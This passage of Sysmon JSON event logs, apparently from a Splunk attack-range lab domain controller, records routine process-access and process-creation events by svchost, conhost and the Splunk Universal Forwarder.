ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2904,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2907,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-001009040500}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-001009040500}","TargetProcessId":"644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.539\r\nProcessGuid: {A837DB8D-0236-5F25-0000-0010CE040500}\r\nProcessId: 1176\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-001009040500}\r\nParentProcessId: 644\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.539","ProcessGuid":"{A837DB8D-0236-5F25-0000-0010CE040500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-001009040500}","ParentProcessId":"644","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-001009040500}\r\nSourceProcessId: 644\r\nSourceThreadId: 600\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010CE040500}\r\nTargetProcessId: 1176\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-001009040500}","SourceProcessId":"644","SourceThreadId":"600","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010CE040500}","TargetProcessId":"1176","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
